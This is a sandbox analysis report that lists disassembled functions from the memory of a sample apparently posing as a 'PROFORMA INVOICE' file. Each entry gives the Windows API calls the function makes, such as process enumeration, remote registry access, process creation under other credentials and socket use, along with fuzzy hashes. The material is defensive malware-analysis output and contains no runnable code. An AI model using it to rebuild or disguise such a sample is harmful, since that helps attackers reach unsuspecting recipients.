Function 00FA2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FA2485
__wcsnicmp.LIBCMT ref: 00FA24A6
__wcsnicmp.LIBCMT ref: 00FA24C0

Strings

#notrayicon, xrefs: 00FA247D
#requireadmin, xrefs: 00FA24A0
#OnAutoItStartRegister, xrefs: 00FA24BA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 9511417164e6a98c112da63e61057780ce2b1cb6bdc070605e6007b722a12ed1
Instruction ID: 20430ce83eb9d814e38cfc0903409cf8462a0a15ec1373acbafc8befb504a246
Opcode Fuzzy Hash: 9511417164e6a98c112da63e61057780ce2b1cb6bdc070605e6007b722a12ed1
Instruction Fuzzy Hash: 31213AB2B042116BD320FB28DC12FBB7399FF66310F54802AF94997146E7599942F3D6

Function 00FA0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FA09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FA09F1
SysAllocString.OLEAUT32(00000000), ref: 00FA09F4
SysAllocString.OLEAUT32 ref: 00FA0A15
SysFreeString.OLEAUT32 ref: 00FA0A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00FA0A38
SysAllocString.OLEAUT32(?), ref: 00FA0A46

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6d476360c3d714ce7de836bbac716343ee0cfca91ecd02e9df86c53cac526366
Instruction ID: c42597dc0f79e9392a5afa4e6bef2888a67ed0683de33e14b23fa2d937461dc8
Opcode Fuzzy Hash: 6d476360c3d714ce7de836bbac716343ee0cfca91ecd02e9df86c53cac526366
Instruction Fuzzy Hash: DA218676600204AFDB10DFA8DC88DAB77ECEF493707048125F909CB2A1DA75EC45A764

Function 00FCA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F7D1BA
Part of subcall function 00F7D17C: GetStockObject.GDI32(00000011), ref: 00F7D1CE
Part of subcall function 00F7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F7D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FCA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FCA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FCA345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FCA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FCA360

Strings

Msctls_Progress32, xrefs: 00FCA2FE

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 8b3035522d52150c7ee0642b483cd21ff350609530eb333b50d3658c74a623a2
Instruction ID: 1457186f983b880e4409777590a3996426e2d2931d168d64afef5cf3a47e724c
Opcode Fuzzy Hash: 8b3035522d52150c7ee0642b483cd21ff350609530eb333b50d3658c74a623a2
Instruction Fuzzy Hash: 1D1181B155011DBEEF115E60CC86EEB7F6DFF087A8F014115BA08A6060C676AC21DBA4

Function 00F7CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00F7CCF6
GetWindowRect.USER32(?,?), ref: 00F7CD37
ScreenToClient.USER32(?,?), ref: 00F7CD5F
GetClientRect.USER32(?,?), ref: 00F7CE8C
GetWindowRect.USER32(?,?), ref: 00F7CEA5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: a693681d1301a145b4ce1d608ef548f4c0e5bbcf9ee6f3ca513a43674aacde74
Instruction ID: a4447d22690fd3f55bf487a3e041198fdc867a36e726fefaa1064f849002b6ca
Opcode Fuzzy Hash: a693681d1301a145b4ce1d608ef548f4c0e5bbcf9ee6f3ca513a43674aacde74
Instruction Fuzzy Hash: FBB13C79A0024ADBDF10CFA8C5847EDB7B1FF08710F18D52AEC599B250DB30A950EBA5

Function 00FC1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00FC1C18
Process32FirstW.KERNEL32(00000000,?), ref: 00FC1C26
__wsplitpath.LIBCMT ref: 00FC1C54

Part of subcall function 00F81DFC: __wsplitpath_helper.LIBCMT ref: 00F81E3C

_wcscat.LIBCMT ref: 00FC1C69
Process32NextW.KERNEL32(00000000,?), ref: 00FC1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00FC1CF1

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: d15e96ef0f6a4fb1d6ff50a2a4fd998c9aa593aa01aecf1a49b585d038339ab2
Instruction ID: 8d5af3f02caad70dd1575547fb7d7a422f96ee223edf9b41f068b0daac2c26b9
Opcode Fuzzy Hash: d15e96ef0f6a4fb1d6ff50a2a4fd998c9aa593aa01aecf1a49b585d038339ab2
Instruction Fuzzy Hash: 97515C715043419FD720EF24CC86EABB7ECEF88754F00491EF58A97251EB749A04DB92

Function 00FC2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FC2BB5,?,?), ref: 00FC3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FC30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FC30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00FC3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FC313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FC317E
RegCloseKey.ADVAPI32(00000000), ref: 00FC318B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: db44073acf5cd07bfd3b90cac7c9fdb53d6705f53db6742249e7ae7bf002e65e
Instruction ID: 101d37c00a844547501fece5635faad3291f5de3800e34dbd2af0442e2163a49
Opcode Fuzzy Hash: db44073acf5cd07bfd3b90cac7c9fdb53d6705f53db6742249e7ae7bf002e65e
Instruction Fuzzy Hash: AB517C32504301AFC700EF64CD82E6ABBE9FF89354F04891DF595872A1DB75EA09EB52

Function 00FC84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00FC8540
GetMenuItemCount.USER32(00000000), ref: 00FC8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FC859F
GetMenuItemID.USER32(?,?), ref: 00FC860E
GetSubMenu.USER32(?,?), ref: 00FC861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 00FC866D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 7368e506278eedacadc1bef4b6ec0272576e2d4cd35ef4a51cb2fee41dfa12de
Instruction ID: 76f75a816ff22da9c1e08cefe4986ed9a6de71f121efbbace36d00983831addf
Opcode Fuzzy Hash: 7368e506278eedacadc1bef4b6ec0272576e2d4cd35ef4a51cb2fee41dfa12de
Instruction Fuzzy Hash: 39519E71E0021AAFCF11EF64C942EAEB7F4EF48360F144459E915BB351CB75AE42AB90

Function 00FA4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FA4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA4B5B
IsMenu.USER32(00000000), ref: 00FA4B7B
CreatePopupMenu.USER32 ref: 00FA4BAF
GetMenuItemCount.USER32(000000FF), ref: 00FA4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FA4C3E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: f3bf17e2fa9a35a11da01c63280b7e33fa2d0d011f41f84239e6b874c03158b0
Instruction ID: ab95954bf41311191e2425eec1b10d471a35954b857b5a69dba260be6b659f81
Opcode Fuzzy Hash: f3bf17e2fa9a35a11da01c63280b7e33fa2d0d011f41f84239e6b874c03158b0
Instruction Fuzzy Hash: 4151C3B0A01349DFCF20CF64C888BADBBF4AF86364F144159E4299B291D7B1A944EB61

Function 00FB8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00FFDC00), ref: 00FB8E7C
WSAGetLastError.WSOCK32(00000000), ref: 00FB8E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00FB8EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00FB8EC5
_strlen.LIBCMT ref: 00FB8EF7
WSAGetLastError.WSOCK32(00000000), ref: 00FB8F6A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: d5bfa0dad92705ac3756d7377f485a955a27ddb30fa381401540cf47450224a6
Instruction ID: 73400f9149d19e143ab19449fd9bcd391e593562aac13e6f08ae65291450adf9
Opcode Fuzzy Hash: d5bfa0dad92705ac3756d7377f485a955a27ddb30fa381401540cf47450224a6
Instruction Fuzzy Hash: 3341A071900108AFCB14EBA5CD85EEEB7BDAF88350F104259F51A97291DF34EE41EB60

Function 00F7ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

BeginPaint.USER32(?,?,?), ref: 00F7AC2A
GetWindowRect.USER32(?,?), ref: 00F7AC8E
ScreenToClient.USER32(?,?), ref: 00F7ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F7ACBC
EndPaint.USER32(?,?,?,?,?), ref: 00F7AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00FDE673

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 672ff4fc4fc98c4161d346bc4ed1425796d8a1f2fe9f33b3370221f09aed5072
Instruction ID: 22c1e5015ccd406e4ab3026ad004e0b67deceaa34a36079c5cbf019316395583
Opcode Fuzzy Hash: 672ff4fc4fc98c4161d346bc4ed1425796d8a1f2fe9f33b3370221f09aed5072
Instruction Fuzzy Hash: 2A41C671504305AFC721DF24DC84F7A7BA8EB99330F18466AF9988B2A1C7359845EB63

Function 00FCE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(01021628,00000000,01021628,00000000,00000000,01021628,?,00FDDC5D,00000000,?,00000000,00000000,00000000,?,00FDDAD1,00000004), ref: 00FCE40B
EnableWindow.USER32(00000000,00000000), ref: 00FCE42F
ShowWindow.USER32(01021628,00000000), ref: 00FCE48F
ShowWindow.USER32(00000000,00000004), ref: 00FCE4A1
EnableWindow.USER32(00000000,00000001), ref: 00FCE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FCE4E8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 26c5f630a76944369cc0491a9c06dd66a7b5bf00a098e24510e00fbe09435cd7
Instruction ID: 08fcf63f97acb518f6436925f8ebb5215cec9cff5d9b748733d96756a346af55
Opcode Fuzzy Hash: 26c5f630a76944369cc0491a9c06dd66a7b5bf00a098e24510e00fbe09435cd7
Instruction Fuzzy Hash: F5418438A01146EFDB29CF24C69AF947BE1BF45314F1841BDEA588F1A2C731E841EB51

Function 00FA98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00FA98D1

Part of subcall function 00F7F4EA: std::exception::exception.LIBCMT ref: 00F7F51E
Part of subcall function 00F7F4EA: __CxxThrowException@8.LIBCMT ref: 00F7F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FA9908
EnterCriticalSection.KERNEL32(?), ref: 00FA9924
LeaveCriticalSection.KERNEL32(?), ref: 00FA999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FA99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00FA99D2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: b5a5d28f7214207ecd9c7d584928bd10d3e021c28286d8e3127ef74c0486eb74
Instruction ID: 64cdb18a02edc20f9e96ce0e4bae20ce8e3d39e313e8f734dc3e4a0ea53e8855
Opcode Fuzzy Hash: b5a5d28f7214207ecd9c7d584928bd10d3e021c28286d8e3127ef74c0486eb74
Instruction Fuzzy Hash: D2318171900105ABDB10DF94DC85E6FB7B8FF45310B1480BAF905AB246D775DE14EBA1

Function 00FB9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00FB77F4,?,?,00000000,00000001), ref: 00FB9B53

Part of subcall function 00FB6544: GetWindowRect.USER32(?,?), ref: 00FB6557

GetDesktopWindow.USER32 ref: 00FB9B7D
GetWindowRect.USER32(00000000), ref: 00FB9B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00FB9BB6

Part of subcall function 00FA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FA7AD0

GetCursorPos.USER32(?), ref: 00FB9BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FB9C44

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 4287f66fa3dd62d67e7e80aed8e9f5cd6a39ea70668d2a2eb3b537f60bdead21
Instruction ID: cb0057838059b38c4017dde2917c70e5ab9a39bf89e49c8a80a70db36913f682
Opcode Fuzzy Hash: 4287f66fa3dd62d67e7e80aed8e9f5cd6a39ea70668d2a2eb3b537f60bdead21
Instruction Fuzzy Hash: 3031EF72608359ABC710DF14DC89F9AB7EDFF89314F00092AF685D7191DA71EA04DB92

Function 00F9AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F9AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 00F9AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F9AFC4
CloseHandle.KERNEL32(00000004), ref: 00F9AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F9AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 00F9B012

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7a313d08ab02a64e573d592b2630428223c1c0b0a5fb82d5363fa3058a42f06f
Instruction ID: e2219856b7d7a74c6bd37154dc25604eb4fd413d8b09e397432e8f55d891826e
Opcode Fuzzy Hash: 7a313d08ab02a64e573d592b2630428223c1c0b0a5fb82d5363fa3058a42f06f
Instruction Fuzzy Hash: CF215E7250024DAFEF128F94ED49FAE7BA9EF44318F144015FA01A6161C376DD21FBA1

Function 00FCEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00F7AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F7AFE3
Part of subcall function 00F7AF83: SelectObject.GDI32(?,00000000), ref: 00F7AFF2
Part of subcall function 00F7AF83: BeginPath.GDI32(?), ref: 00F7B009
Part of subcall function 00F7AF83: SelectObject.GDI32(?,00000000), ref: 00F7B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00FCEC20
LineTo.GDI32(00000000,00000003,?), ref: 00FCEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00FCEC42
LineTo.GDI32(00000000,00000000,?), ref: 00FCEC52
EndPath.GDI32(00000000), ref: 00FCEC62
StrokePath.GDI32(00000000), ref: 00FCEC72

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 2db7c30c58c6f3cda6e72a21ccfa9d2835a6f10723a6c8055ad6b15605582ccc
Instruction ID: 2af6e85993ecaf99d1e50a81a9927cb51f5bbe02948b6cfcacec3d799b51305a
Opcode Fuzzy Hash: 2db7c30c58c6f3cda6e72a21ccfa9d2835a6f10723a6c8055ad6b15605582ccc
Instruction Fuzzy Hash: C2110C7640014DBFEF129F90DD88EDA7F6DEB08360F048122FE0849564D7719D55EBA0

Function 00F9E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F9E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 00F9E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F9E1D8
ReleaseDC.USER32(00000000,00000000), ref: 00F9E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F9E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 00F9E209

Part of subcall function 00F99AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00F99A05,00000000,00000000,?,00F99DDB), ref: 00F9A53A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
